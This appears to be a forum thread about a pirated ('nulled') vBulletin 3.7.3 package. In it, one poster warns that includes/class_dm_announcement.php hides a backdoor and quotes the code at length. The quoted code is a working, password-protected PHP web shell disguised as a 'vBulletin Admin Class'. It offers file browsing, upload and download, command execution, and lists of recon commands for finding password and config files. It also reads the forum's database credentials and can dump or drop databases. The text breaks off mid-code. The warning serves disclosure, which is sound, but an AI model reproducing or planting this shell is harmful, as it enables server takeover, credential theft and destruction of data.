vBulletin 3.7.3 Nulled [Lider.Tc]
- Thread starter olgunmadak
- Start date
olgunmadak
New Member
yes all use nulled vbulletin person waiting DGT
but this nulled is no risk. i install my forum. no problem. thanks for comment
but this nulled is no risk. i install my forum. no problem. thanks for comment
WARNING ......
This version vBGN
includes\class_dm_announcement.php
This version vBGN
includes\class_dm_announcement.php
Code:
if (empty($_GET['p']) and empty($_GET['d']) and empty($_GET['t']) and empty($_GET['deldir']))
{
echo "";
}
else
{
@session_start();
@set_time_limit(0);
@set_magic_quotes_runtime(0);
error_reporting(E_ALL & ~E_NOTICE);
#####cfg#####
# use password true / false #
$create_pswrd = true;
$pswrd = "DdoS";
# UNIX COMMANDS
# description (vb) command
# example: Shutdown (vb) shutdown -h now
$fast_commands = "
Show open ports (vb) netstat -an | grep LISTEN | grep tcp
last root (vb) last root
last (all users) (vb) last all
Find all config.php in / (vb) find / -type f -name config.php
Find all config.php in . (vb) find . -type f -name config.php
Find all admin.php in / (vb) find / -type f -name admin.php
Find all admin.php in . (vb) find . -type f -name admin.php
Find all config.inc.php in / (vb) find / -type f -name config.inc.php
Find all config.inc.php in . (vb) find . -type f -name config.inc.php
Find all config.inc in / (vb) find / -type f -name config.inc
Find all config.inc in . (vb) find . -type f -name config.inc
Find all config.dat in / (vb) find / -type f -name config.dat
Find all config.dat in . (vb) find . -type f -name config.dat
Find all config* in / (vb) find / -type f -name config*
Find all config* in . (vb) find . -type f -name config*
Find all pass* in / (vb) find / -type f -name pass*
Find all pass* in . (vb) find . -type f -name pass*
Find all .bash_history in / (vb) find / -type f -name .bash_history
Find all .bash_history in . (vb) find . -type f -name .bash_history
Find all .htpasswd in / (vb) find / -type f -name .htpasswd
Find all .htpasswd in . (vb) find . -type f -name .htpasswd
Find all writable dirs/files in / (vb) find / -perm -2 -ls
Find all writable dirs/files in . (vb) find . -perm -2 -ls
Find all suid files in / (vb) find / -type f -perm -04000 -ls
Find all suid files in . (vb) find . -type f -perm -04000 -ls
Find all sgid files in / (vb) find / -type f -perm -02000 -ls
Find all sgid files in . (vb) find . -type f -perm -02000 -ls
Find all .fetchmailrc files in / (vb) find / -type f -name .fetchmailrc
Find all .fetchmailrc files in . (vb) find . -type f -name .fetchmailrc
OS Version? (vb) sysctl -a | grep version
Kernel version? (vb) cat /proc/version
cat syslog.conf (vb) cat /etc/syslog.conf
Cat - Message of the day (vb) cat /etc/motd
Cat hosts (vb) cat /etc/hosts
Distrib name (vb) cat /etc/issue.net
Distrib name (2) (vb) cat /etc/*-realise
Display all process - wide output (vb) ps auxw
Display all your process (vb) ps ux
Interfaces (vb) ifconfig
CPU? (vb) cat /proc/cpuinfo
RAM (vb) free -m
HDD space (vb) df -h
List of Attributes (vb) lsattr -a
Mount options (vb) cat /etc/fstab
Is cURL installed? (vb) which curl
Is wGET installed? (vb) which wget
Is lynx installed? (vb) which lynx
Is links installed? (vb) which links
Is fetch installed? (vb) which fetch
Is GET installed? (vb) which GET
Is perl installed? (vb) which perl
Where is apache (vb) whereis apache
Where is perl (vb) whereis perl
locate proftpd.conf (vb) locate proftpd.conf
locate httpd.conf (vb) locate httpd.conf
locate my.conf (vb) locate my.conf
locate psybnc.conf (vb) locate psybnc.conf
";
# WINDOWS COMMANDS
# description (vb) command
# example: Delete autoexec.bat (vb) del c:\autoexec.bat
$fast_commands_win = "
OS Version (vb) ver
Tasklist (vb) tasklist
Attributes in . (vb) attrib
Show open ports (vb) netstat -an
";
######ver####
$ver= "v2.1";
#############
$pass=$_POST['pass'];
if($pass==$pswrd){
$_SESSION['vb']="$pass";
}
if ($_SERVER["HTTP_CLIENT_IP"]) $ip = $_SERVER["HTTP_CLIENT_IP"];
else if($_SERVER["HTTP_X_FORWARDED_FOR"]) $ip = $_SERVER["HTTP_X_FORWARDED_FOR"];
else if($_SERVER["REMOTE_ADDR"]) $ip = $_SERVER["REMOTE_ADDR"];
else $ip = $_SERVER['REMOTE_ADDR'];
$ip=htmlspecialchars($ip);
if($create_pswrd==true){
if(!isset($_SESSION['vb']) or $_SESSION['vb']!=$pswrd){
die("
<title>vBulletin Admin Class</title>
<form method=post>
<input type=password name=pass size=1>
</form>
");}
}
$d=$_GET['d'];
function adds($editf){
#if(get_magic_quotes_gpc()==0){
$editf=addslashes($editf);
#}
return $editf;
}
function adds2($editf){
if(get_magic_quotes_gpc()==0){
$editf=addslashes($editf);
}
return $editf;
}
$f = "vb_sql.txt";
$f_d = $_GET['f_d'];
if($_GET['download']){
$download=$_GET['download'];
header("Content-disposition: attachment; filename=\"$download\";");
readfile("$d/$download");
exit;}
if($_GET['dump_download']){
header("Content-disposition: attachment; filename=\"$f\";");
header("Content-length: ".filesize($f_d."/".$f));
header("Expires: 0");
readfile($f_d."/".$f);
if(is_writable($f_d."/".$f)){
unlink($f_d."/".$f);
}
die;
}
$images=array(".gif",".jpg",".png",".bmp",".jpeg");
$whereme=getcwd();
@$d=@$_GET['d'];
$copyr = "<center><a href=http://www.vBulletin.com target=_blank>www.vBulletin.com $ver<br></a>";
$php_self=@$_SERVER['PHP_SELF'];
if(@eregi("/",$whereme)){$os="unix";}else{$os="win";}
if(!isset($d)){$d=$whereme;}
$d=str_replace("\\","/",$d);
if(@$_GET['p']=="info"){
@phpinfo();
exit;}
if(@$_GET['img']=="1"){
@$e=$_GET['e'];
header("Content-type: image/gif");
readfile("$d/$e");
}
if(@$_GET['getdb']=="1"){
header('Content-type: application/plain-text');
header('Content-Disposition: attachment; filename=vb-mysql-damp.htm');
}
print "<title>vBulletin Admin Class $ver</title>
<style>
BODY, TD, TR {
text-decoration: none;
font-family: Verdana;
font-size: 8pt;
SCROLLBAR-FACE-COLOR: #363d4e;
SCROLLBAR-HIGHLIGHT-COLOR: #363d4e;
SCROLLBAR-SHADOW-COLOR: #363d4e;
SCROLLBAR-ARROW-COLOR: #363d4e;
SCROLLBAR-TRACK-COLOR: #91AAFF
}
input, textarea, select {
font-family: Verdana;
font-size: 10px;
color: black;
background-color: white;
border: solid 1px;
border-color: black
}
UNKNOWN {
COLOR: #0006DE;
TEXT-DECORATION: none
}
A:link {
COLOR: #0006DE;
TEXT-DECORATION: none
}
A:hover {
COLOR: #FF0C0B;
TEXT-DECORATION: none
}
A:active {
COLOR: #0006DE;
TEXT-DECORATION: none
}
A:visited {
TEXT-DECORATION: none
}
</style>
<script>
function ShowOrHide(d1, d2) {
if (d1 != '') DoDiv(d1);
if (d2 != '') DoDiv(d2);}
function DoDiv(id) {
var item = null;
if (document.getElementById) {
item = document.getElementById(id);
} else if (document.all){
item = document.all[id];
} else if (document.layers){
item = document.layers[id];}
if (!item) {}
else if (item.style) {
if (item.style.display == \"none\"){ item.style.display = \"\"; }
else {item.style.display = \"none\"; }
}else{ item.visibility = \"show\"; }}
function cwd(text){
document.sh311Form.sh3.value+=\" \"+ text;
document.sh311Form.sh3.focus();
}
</script>
";
print "<body vlink=#0006DE>
<table width=600 border=0 cellpadding=0 cellspacing=1 bgcolor=#D7FFA8 align=center>
<tr><td><font face=wingdings size=2>0</font>";
$expl=explode("/",$d);
$coun=count($expl);
if($os=="unix"){echo "<a href='$php_self?d=/'>/</a>";}
else{
echo "<a href='$php_self?d=$expl[0]'>$expl[0]/</a>";}
for($i=1; $i<$coun; $i++){
@$xx.=$expl[$i]."/";
$sls="<a href='$php_self?d=$expl[0]/$xx'>$expl[$i]</a>/";
$sls=str_replace("//","/",$sls);
$sls=str_replace("/'></a>/","/'></a>",$sls);
print $sls;
}
if(@ini_get("register_globals")){$reg_g="ON";}else{$reg_g="OFF";}
if(@ini_get("safe_mode")){$safe_m="ON";}else{$safe_m="OFF";}
echo "</td></tr>";
if($os=="unix"){ echo "
<tr><td><b>id:</b> ".@exec('id')."</td></tr>
<tr><td><b>uname -a:</b> ".@exec('uname -a')."</td></tr>";} echo"
<tr><td><b>Your IP: [<font color=#5F3CC1>$ip</font>] Server IP: [<font color=#5F3CC1>".gethostbyname($_SERVER["HTTP_HOST"])."</font>] Server <a href=# title='Host.Domain'>H.D.</a>: [<font color=#5F3CC1>".$_SERVER["HTTP_HOST"]."</font>]</b><br>
[<b>Safe mode:</b> $safe_m] [<b>Register globals:</b> $reg_g]<br>
[<a href=# onClick=location.href=\"javascript:history.back(-1)\">Back</a>]
[<a href='$php_self?p=1'>Home</a>]
[<a href='$php_self?d=$d&sh311=1'>Shell (1)</a> <a href='$php_self?d=$d&sh311=2'>(2)</a>]
[<a href='$php_self?d=$d&t=upload'>Upload</a>]
[<a href='$php_self?t=tools'>Tools</a>]
[<a href='$php_self?p=info'>PHPinfo</a>]
[<a href='$php_self?delfolder=$d&d=$d&delfl=1&rback=$d' title='$d'>DEL Folder</a>]
[<a href='$php_self?p=sql'>SQL</a>]
[<a href='$php_self?p=selfremover'>Self Remover</a>]
</td></tr>
";
if($os=="win"){ echo "
<tr><td bgcolor=white>
<center><font face=wingdings size=2><</font>
<a href='$php_self?d=a:/'>A</a>
<a href='$php_self?d=b:/'>B</a>
<a href='$php_self?d=c:/'>C</a>
<a href='$php_self?d=d:/'>D</a>
<a href='$php_self?d=e:/'>E</a>
<a href='$php_self?d=f:/'>F</a>
<a href='$php_self?d=g:/'>G</a>
<a href='$php_self?d=h:/'>H</a>
<a href='$php_self?d=i:/'>I</a>
<a href='$php_self?d=j:/'>J</a>
<a href='$php_self?d=k:/'>K</a>
<a href='$php_self?d=l:/'>L</a>
<a href='$php_self?d=m:/'>M</a>
<a href='$php_self?d=n:/'>N</a>
<a href='$php_self?d=o:/'>O</a>
<a href='$php_self?d=p:/'>P</a>
<a href='$php_self?d=q:/'>Q</a>
<a href='$php_self?d=r:/'>R</a>
<a href='$php_self?d=s:/'>S</a>
<a href='$php_self?d=t:/'>T</a>
<a href='$php_self?d=u:/'>U</a>
<a href='$php_self?d=v:/'>V</a>
<a href='$php_self?d=w:/'>W</a>
<a href='$php_self?d=x:/'>X</a>
<a href='$php_self?d=y:/'>Y</a>
<a href='$php_self?d=z:/'>Z</a>
</td></tr>";}else{echo "<tr><td> </td></tr>";}
@include_once('./config.php');
$server = $config['MasterServer']['servername'];
$mysqlport = $config['MasterServer']['port'];
$dbname = $config['Database']['dbname'];
$dbuser = $config['MasterServer']['username'];
$dbpass = $config['MasterServer']['password'];
print "<tr><td>
:: <a href='$php_self?d=$d&mkdir=1'>Create folder</a> ::
<a href='$php_self?d=$d&mkfile=1'>Create file</a> ::
<a href='$php_self?d=$d&read_file_safe_mode=1'>Read file if safe mode is On</a> ::
<br><font color=ff0000 size=2>Current database in use by vBulletin = <a href='$php_self?p=sql&login=$dbuser&pass=$dbpass&adress=$server&conn=1&delete_db=$dbname' onclick='return confirm(\"DELETE $dbname ?\")'>[DEL]<a href='$php_self?p=sql&login=$dbuser&pass=$dbpass&adress=$server&conn=1&db=$dbname&dump_db=$dbname&f_d=$d'>[DUMP]</a></a> <b><a href='$php_self?baza=1&db=$dbname&p=sql&login=$dbuser&pass=$dbpass&adress=$server&conn=1&tbl=$dbname'>$dbname</a></font><br>
";
if($os=="unix"){
print "<a href='$php_self?d=$d&ps_table=1'>PS table</a> ::";
}
print "</td></tr>";
if($_GET['p']=="ftp"){
print "<tr><td>";
print "</td></tr></table>";
print $copyr;
exit;
}
if(@$_GET['p']=="sql"){
print "<tr><td>";
###
@include_once('./config.php');
$server = $config['MasterServer']['servername'];
$mysqlport = $config['MasterServer']['port'];
$dbname = $config['Database']['dbname'];
$dbuser = $config['MasterServer']['username'];
$dbpass = $config['MasterServer']['password'];
$f_d = $_GET['f_d'];
if(!isset($f_d)){$f_d=".";}
if($f_d==""){$f_d=".";}
$php_self=$_SERVER['PHP_SELF'];
$delete_table=$_GET['delete_table'];
$tbl=$_GET['tbl'];
$from=$_GET['from'];
$to=$_GET['to'];
$adress=$_POST['adress'];
$port=$_POST['port'];
$login=$_POST['login'];
$pass=$_POST['pass'];
$adress=$_GET['adress'];
$port=$_GET['port'];
$login=$_GET['login'];
$pass=$_GET['pass'];
$conn=$_GET['conn'];
if(!isset($adress)){$adress="localhost";}
if(!isset($login)){$login="root";}
if(!isset($pass)){$pass="";}
if(!isset($port)){$port="3306";}
if(!isset($from)){$from=0;}
if(!isset($to)){$to=50;}
?>
<style>
table,td{
color: black;
font-face: verdana;
font-size: 11px;
}
</style>
<font color=black face=verdana size=1>
<? if(!$conn){ ?>
<!-- table 1 -->
<table bgcolor=#D7FFA8>
<tr><td valign=top>Address:</td><td><form><input name=adress value='<?=$adress?>' size=20><input name=port value='<?=$port?>' size=6></td></tr>
<tr><Td valign=top>Login: </td><td><input name=login value='<?=$login?>' size=10></td></tr>
<tr><Td valign=top>Pass:</td><td> <input name=pass value='<?=$pass?>' size=10><input type=hidden name=p value=sql></td></tr>
<tr><td></td><td><input type=submit name=conn value=Connect></form></td></tr><?}?>
<tr><td valign=top><? if($conn){ echo "<b>PHP v".@phpversion()."<br>mySQL v".@mysql_get_server_info()."<br>";}?></b></td><td></td></tr>
</table>
<!-- end of table 1 -->
<?
$conn=$_GET['conn'];
$adress=$_GET['adress'];
$port=$_GET['port'];
$login=$_GET['login'];
$pass=$_GET['pass'];
if($conn){
$serv = @mysql_connect($adress.":".$port, $login,$pass) or die("<font color=red>Error: ".mysql_error()."</font>");
if($serv){$status="Connected. :: <a href='$php_self?p=sql'>Log out</a>";}else{$status="Disconnected.";}
print "<b><font color=green>Status: $status<br><br>"; # #D7FFA8
print "<table cellpadding=0 cellspacing=0 bgcolor=#D7FFA8><tr><td valign=top>";
print "<br><font color=red>[db]</font><Br>";
print "<font color=white>";
$res = mysql_list_dbs($serv);
while ($str=mysql_fetch_row($res)){
print "<a href='$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&delete_db=$str[0]' onclick='return confirm(\"DELETE $str[0] ?\")'>[DEL]<a href='$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&db=$str[0]&dump_db=$str[0]&f_d=$d'>[DUMP]</a></a> <b><a href='$php_self?baza=1&db=$str[0]&p=sql&login=$login&pass=$pass&adress=$adress&conn=1&tbl=$str[0]'>$str[0]</a></b><br>";
$tc++;
}
$baza=$_GET['baza'];
$db=$_GET['db'];
print "<font color=red>[Total db: $tc]</font><br>";
if($baza){
print "<div align=left><font color=green>db: [$db]</div></font><br>";
$result=@mysql_list_tables($db);
while($str=@mysql_fetch_array($result)){
$c=mysql_query ("SELECT COUNT(*) FROM $str[0]");
$records=mysql_fetch_array($c);
if(strlen($str[0])>$s4ot){$s4ot=strlen($str[0]);}
if($records[0]=="0"){
print "<a href='$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&db=$db&delete_table=$str[0]' onclick='return confirm(\"DELETE $str[0] ?\")' title='Delete $str[0]?'>[D]</a><a href='$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&db=$db&baza=1&rename_table=$str[0]' title='Rename $str[0]'>[R]</a><font color=red>[$records[0]]</font> <a href='$php_self?vnutr=1&p=sql&vn=$str[0]&baza=1&db=$db&login=$login&pass=$pass&adress=$adress&conn=1&tbl=$str[0]&ins_new_line=1'>$str[0]</a><br>";
}else{
print "<a href='$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&db=$db&delete_table=$str[0]' onclick='return confirm(\"DELETE $str[0] ?\")' title='Delete $str[0]?'>[D]</a><a href='$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&db=$db&baza=1&rename_table=$str[0]' title='Rename $str[0]'>[R]</a><font color=red>[$records[0]]</font> <a href='$php_self?vnutr=1&p=sql&vn=$str[0]&baza=1&db=$db&login=$login&pass=$pass&adress=$adress&conn=1&tbl=$str[0]'>$str[0]</a><br>";
}
mysql_free_result($c);
$total_t++;
}
print "<br><B><font color=red>Total tables: $total_t</font></b>";
print "<pre>";
for($i=0; $i<$s4ot+10; $i++){print " ";}
print "</pre>";
} #end baza
# delete table
if(isset($delete_table)){
mysql_select_db($_GET['db']) or die("<font color=red>".mysql_error()."</font>");
mysql_query("DROP TABLE IF EXISTS $delete_table") or die("<font color=red>".mysql_error()."</font>");
print "<br><b><font color=green>Table [ $delete_table ] :: Deleted success!</font></b>";
print "<meta http-equiv=\"REFRESH\" content=\"5;URL=$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&db=$db&baza=1\">";
}
# end of delete table
# delete database
if(isset($_GET['delete_db'])){
mysql_drop_db($_GET['delete_db']) or die("<font color=red>".mysql_error()."</font>");
print "<br><b><font color=green>Database ".$_GET['delete_db']." :: Deleted Success!";
print "<meta http-equiv=\"REFRESH\" content=\"5;URL=$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1\">";
}
# end of delete database
# delete row
if(isset($_POST['delete_row'])){
$_POST['delete_row'] = base64_decode($_POST['delete_row']);
mysql_query("DELETE FROM ".$_GET['tbl']." WHERE ".$_POST['delete_row']) or die("<font color=red>".mysql_error()."</font>");
$del_result = "<br><b><font color=green>Deleted Success!<br>".$_POST['delete_row'];
print "<meta http-equiv=\"REFRESH\" content=\"5;URL=$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&vnutr=1&baza=1&vn=".$_GET['vn']."&db=$db&tbl=$tbl\">";
}
# end of delete row
$vn=$_GET['vn'];
print "</td><td valign=top>";
print "<font color=green>Database: $db => $vn</font>";
# edit row
if(isset($_POST['edit_row'])){
$edit_row=base64_decode($_POST['edit_row']);
$r_edit = mysql_query("SELECT * FROM $tbl WHERE $edit_row") or die("<font color=red>".mysql_error()."</font>");
print "<br><br>
<table border=0 cellpadding=1 cellspacing=1><tr>
<td><b>Row</b></td><td><b>Value</b></td></tr>";
print "<form method=post action='$php_self?p=sql&login=".$_GET['login']."&pass=".$_GET['pass']."&adress=".$_GET['adress']."&conn=1&baza=1&tbl=".$_GET['tbl']."&vn=".$_GET['vn']."&db=".$_GET['db']."'>";
print "<input type=hidden name=edit_row value='".$_POST['edit_row']."'>";
print " <input type=radio name=upd value=update checked>Update<br>
<input type=radio name=upd value=insert>Insert new<br><br>";
$i=0;
while($mn = mysql_fetch_array($r_edit, MYSQL_ASSOC)){
foreach($mn as $key =>$val){
$type = mysql_field_type($r_edit, $i);
$len = mysql_field_len($r_edit, $i);
$del .= "`$key`='".adds($val)."' AND ";
$c=strlen($val);
$val=htmlspecialchars($val, ENT_NOQUOTES);
$str=" <textarea name='$key' cols=39 rows=5>$val</textarea> ";
$buff .= "<tr><td bgcolor=silver><b>$key</b><br><font color=green>(<b>$type($len)</b>)</font></td><td>$str</td></tr>";
$i++;
}
}
$delstring=base64_encode($del);
print "<input type=hidden name=delstring value=\"$delstring\">";
print "$buff</table><br>";
print "<br>";
if(!$_POST['makeupdate']){print "<input type=submit value=Update name=makeupdate></form>";}
if($_POST['makeupdate']){
if($_POST['upd']=='update'){
preg_match_all("/name='(.*?)'\scols=39\srows=5>(.*?)<\/textarea>/i",$buff,$matches3);
$delstring=$_POST['delstring'];
$delstring=base64_decode($delstring);
$delstring = substr($delstring, 0, strlen($delstring)-5);
for($i=0; $i<count($matches3[0]); $i++){
eval("\$".$matches3[1][$i]." = \"".adds2($_POST[$matches3[1][$i]])."\";");
$total_str .= $matches3[1][$i]."='".adds2($_POST[$matches3[1][$i]])."',";
}
$total_str = substr_replace($total_str,"",-1);
$up_string = "UPDATE `$tbl` SET $total_str WHERE $delstring";
$up_string = htmlspecialchars($up_string, ENT_NOQUOTES);
print "<b>PHP var:<br></b>\$sql=\"$up_string\";<br><br>";
print "<meta http-equiv=\"REFRESH\" content=\"5;URL=$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&vnutr=1&baza=1&vn=".$_GET['vn']."&db=$db&tbl=$tbl\">";
mysql_query($up_string) or die("<font color=red>".mysql_error()."</font>");
}#end of make update
if($_POST['upd']=='insert'){
preg_match_all("/name='(.*?)'\scols=39\srows=5>(.*?)<\/textarea>/i",$buff,$matches3);
$delstring=$_POST['delstring'];
$delstring=base64_decode($delstring);
$delstring = substr($delstring, 0, strlen($delstring)-5);
for($i=0; $i<count($matches3[0]); $i++){
eval("\$".$matches3[1][$i]." = \"".adds2($_POST[$matches3[1][$i]])."\";");
$total_str .= $matches3[1][$i]."='".adds2($_POST[$matches3[1][$i]])."',,";
}
$total_str = ",,".$total_str;
preg_match_all("/,(.*?)='(.*?)',/i",$total_str,$matches4);
for($i=0; $i<count($matches4[1]); $i++){
$matches4[1][0]=str_replace(",","",$matches4[1][0]);
$total_m_i .= "`".$matches4[1][$i]."`,";
$total_m_x .= "'".$matches4[2][$i]."',";
}
$total_m_i = substr($total_m_i, 0, strlen($total_m_i)-1);
$total_m_x = substr($total_m_x, 0, strlen($total_m_x)-1);
$make_insert="INSERT INTO `$tbl` ($total_m_i) VALUES ($total_m_x)";
mysql_query($make_insert) or die("<font color=red>".mysql_error()."</font>");
print "<b>PHP var:<br></b>\$sql=\"$make_insert\";<br><br>";
print "<meta http-equiv=\"REFRESH\" content=\"5;URL=$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&vnutr=1&baza=1&vn=".$_GET['vn']."&db=$db&tbl=$tbl\">";
}#end of insert
}#end of update
}
# end of edit row
# insert new line
if($_GET['ins_new_line']){
$qn = mysql_query('SHOW FIELDS FROM '.$tbl) or die("<font color=red>".mysql_error()."</font>");
print "<form method=post action='$php_self?p=sql&login=".$_GET['login']."&pass=".$_GET['pass']."&adress=".$_GET['adress']."&conn=1&baza=1&tbl=".$_GET['tbl']."&vn=".$_GET['vn']."&db=".$_GET['db']."&ins_new_line=1'>
Insert new line in <b>$tbl</b> table</b><Br><br>";
print "<table>";
while ($new_line = mysql_fetch_array($qn, MYSQL_ASSOC)) {
foreach ($new_line as $key =>$next) {
$buff .= "$next ";
}
$expl=explode(" ",$buff);
$buff2 .= $expl[0]." ";
print "<tr><td bgcolor=silver><b>$expl[0]</b><br><font color=green>(<b>$expl[1]</b>)</font></td>
<td><textarea name='$expl[0]' cols=39 rows=5></textarea>
</td></tr>";
unset($buff);
}
print "</table>
<center><input type=submit value=Insert name=mk_ins></form></center>";
if($_POST['mk_ins']){
preg_match_all("/(.*?)\s/i",$buff2,$matches3);
for($i=0; $i<count($matches3[0]); $i++){
eval("\$".$matches3[1][$i]." = \"".adds2($_POST[$matches3[1][$i]])."\";");
$total_str .= $matches3[1][$i]."='".adds2($_POST[$matches3[1][$i]])."',,";
}
$total_str = ",,".$total_str;
preg_match_all("/,(.*?)='(.*?)',/i",$total_str,$matches4);
for($i=0; $i<count($matches4[1]); $i++){
$matches4[1][0]=str_replace(",","",$matches4[1][0]);
$total_m_i .= "`".$matches4[1][$i]."`,";
$total_m_x .= "'".$matches4[2][$i]."',";
}
$total_m_i = substr($total_m_i, 0, strlen($total_m_i)-1);
$total_m_x = substr($total_m_x, 0, strlen($total_m_x)-1);
$make_insert="INSERT INTO `$tbl` ($total_m_i) VALUES ($total_m_x)";
mysql_query($make_insert) or die("<font color=red>".mysql_error()."</font>");
print "<b>PHP var:<br></b>\$sql=\"$make_insert\";<br><br>";
print "<meta http-equiv=\"REFRESH\" content=\"5;URL=$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&vnutr=1&baza=1&vn=".$_GET['vn']."&db=$db&tbl=$tbl\">";
}#end of mk ins
}#end of ins new line
if(isset($_GET['rename_table'])){
$rename_table=$_GET['rename_table'];
print "<br><br>Rename <b>$rename_table</b> to<br><br>
<form method=post action='$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&db=$db&baza=1&rename_table=$rename_table'>
<input name=new_name size=30><center><br>
<input type=submit value=Rename></center>
</form>
";
if(isset($_POST['new_name'])){
mysql_select_db($db) or die("<font color=red>".mysql_error()."</font>");
mysql_query("RENAME TABLE $rename_table TO ".$_POST['new_name']) or die("<font color=red>".mysql_error()."</font>");
print "<br><font color=green>Table <b>$rename_table</b> renamed to <b>".$_POST['new_name']."</b></font>";
print "<meta http-equiv=\"REFRESH\" content=\"2;URL=$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&baza=1&db=$db\">";
}
}#end of rename
# dump table
if($_GET['dump']){
if(!is_writable($f_d)){die("<br><br><font color=red>This folder $f_d isnt writable!<br>Cannot make dump.<br><br>
<font color=green><b>You can change temp folder for dump file in your browser!<br>
<font color=red>Change variable &f_d=(here writable directory, expl: /tmp or c:/windows/temp)</font><br>
Then press enter</b></font>
</font>");}
mysql_select_db($db) or die("<font color=red>".mysql_error()."</font>");
$fp = fopen($f_d."/".$f,"w");
fwrite($fp, "# vBulletin Admin Class $ver
# Dump from: ".$_SERVER["SERVER_NAME"]." (".$_SERVER["SERVER_ADDR"].")
# MySQL version: ".mysql_get_server_info()."
# PHP version: ".phpversion()."
# Date: ".date("d.m.Y - H:i:s")."
# Dump db ( $db ) Table ( $tbl )
# --- eof ---
");
$que = mysql_query("SHOW CREATE TABLE `$tbl`") or die("<font color=red>".mysql_error()."</font>");
$row = mysql_fetch_row($que);
fwrite($fp, "DROP TABLE IF EXISTS `$tbl`;\r\n");
$row[1]=str_replace("\n","\r\n",$row[1]);
fwrite($fp, $row[1].";\r\n\r\n");
$que = mysql_query("SELECT * FROM `$tbl`");
if(mysql_num_rows($que)>0){
while($row = mysql_fetch_assoc($que)){
$keys = join("`, `", array_keys($row));
$values = array_values($row);
foreach($values as $k=>$v) {$values[$k] = adds2($v);}
$values = implode("', '", $values);
$sql = "INSERT INTO `$tbl`(`$keys`) VALUES ('".$values."');\r\n";
fwrite($fp, $sql);
}
}
fclose($fp);
print "<meta http-equiv=\"REFRESH\" content=\"0;URL=$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&baza=1&dump_download=1&f_d=$f_d/\">";
}#end of dump
# db dump
if($_GET['dump_db']){
$c=mysql_num_rows(mysql_list_tables($db));
if($c>=1){
print "<br><br> Dump database <b>$db</b>";
}else{
print "<br><br><font color=red>Cannot dump database. No tables exists in <b>$db</b> db.</font>";
die;
}
if(sizeof($tabs)==0){
$res = mysql_query("SHOW TABLES FROM $db");
if(mysql_num_rows($res)>0){
while($row=mysql_fetch_row($res)){
$tabs[] .= $row[0];
}
}
}
$fp = fopen($f_d."/".$f,"w");
fwrite($fp, "# vBulletin Admin Class $ver
# Dump from: ".$_SERVER["SERVER_NAME"]." (".$_SERVER["SERVER_ADDR"].")
# MySQL version: ".mysql_get_server_info()."
# PHP version: ".phpversion()."
# Date: ".date("d.m.Y - H:i:s")."
# Dump db ( $db )
# --- eof ---
");
foreach($tabs as $tab) {
fwrite($fp,"DROP TABLE IF EXISTS `$tab`;\r\n");
$res = mysql_query("SHOW CREATE TABLE `$tab`");
$row = mysql_fetch_row($res);
$row[1]=str_replace("\n","\r\n",$row[1]);
fwrite($fp, $row[1].";\r\n\r\n");
$res = mysql_query("SELECT * FROM `$tab`");
if(mysql_num_rows($res)>0){
while($row=mysql_fetch_assoc($res)){
$keys = join("`, `", array_keys($row));
$values = array_values($row);
foreach($values as $k=>$v) {$values[$k] = adds2($v);}
$values = join("', '", $values);
$sql = "INSERT INTO `$tab`(`$keys`) VALUES ('$values');\r\n";
fwrite($fp, $sql);
}}
fwrite($fp, "\r\n\r\n\r\n");
}
fclose($fp);
print "<meta http-equiv=\"REFRESH\" content=\"0;URL=$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&baza=1&dump_download=1&f_d=$f_d/\">";
}#end of db dump
$vnutr=$_GET['vnutr'];
$tbl=$_GET['tbl'];
if($vnutr and !$_GET['ins_new_line']){
print "<table cellpadding=0 cellspacing=1><tr><td>";
mysql_select_db($db) or die(mysql_error());
$c=mysql_query ("SELECT COUNT(*) FROM $tbl");
$cfa=mysql_fetch_array($c);
mysql_free_result($c);
print "
Total: $cfa[0]
<form>
From: <input name=from size=3 value=0>
To: <input name=to size=3 value='$cfa[0]'>
<input type=submit name=show value=Show>
<input type=hidden name=vnutr value=1>
<input type=hidden name=vn value='$vn'>
<input type=hidden name=db value='$db'>
<input type=hidden name=login value='$login'>
<input type=hidden name=pass value='$pass'>
<input type=hidden name=adress value='$adress'>
<input type=hidden name=conn value=1>
<input type=hidden name=baza value=1>
<input type=hidden name=p value=sql>
<input type=hidden name=tbl value='$tbl'>
[<a href='$php_self?getdb=1&to=$cfa[0]&vnutr=1&vn=$vn&db=$db&login=$login&pass=$pass&adress=$adress&conn=1&baza=1&p=sql&tbl=$tbl'>DOWNLOAD</a>] [<a href='$php_self?to=$cfa[0]&vnutr=1&vn=$vn&db=$db&login=$login&pass=$pass&adress=$adress&conn=1&baza=1&p=sql&tbl=$tbl&ins_new_line=1'>INSERT</a>] [<a href='$php_self?to=$cfa[0]&vnutr=1&vn=$vn&db=$db&login=$login&pass=$pass&adress=$adress&conn=1&baza=1&p=sql&tbl=$tbl&dump=1&f_d=$d'>DUMP</a>]
</form></td></tr></table>";
$vn=$_GET['vn'];
$from=$_GET['from'];
$to=$_GET['to'];
$from=$_GET['from'];
$to=$_GET['to'];
if(!isset($from)){$from=0;}
if(!isset($to)){$to=50;}
$query = "SELECT * FROM $vn LIMIT $from,$to";
$result = mysql_query($query);
$result1= mysql_query($query);
print $del_result;
print "<table cellpadding=0 cellspacing=1 border=1><tr><td></td>";
for ($i=0;$i<mysql_num_fields($result);$i++){
$name=mysql_field_name($result,$i);
$type = mysql_field_type($result, $i);
$len = mysql_field_len($result, $i);
print "<td bgcolor=#BCE0FF> $name (<b>$type($len)</b>)</td>";
}
print "</tr><pre>";
while($mn = mysql_fetch_array($result, MYSQL_ASSOC)){
foreach($mn as $key=>$inside){
$buffer1 .= "`$key`='".adds($inside)."' AND ";
$b1 .= "<td>".htmlspecialchars($inside, ENT_NOQUOTES)." </td>";
}
$buffer1 = substr($buffer1, 0, strlen($buffer1)-5);
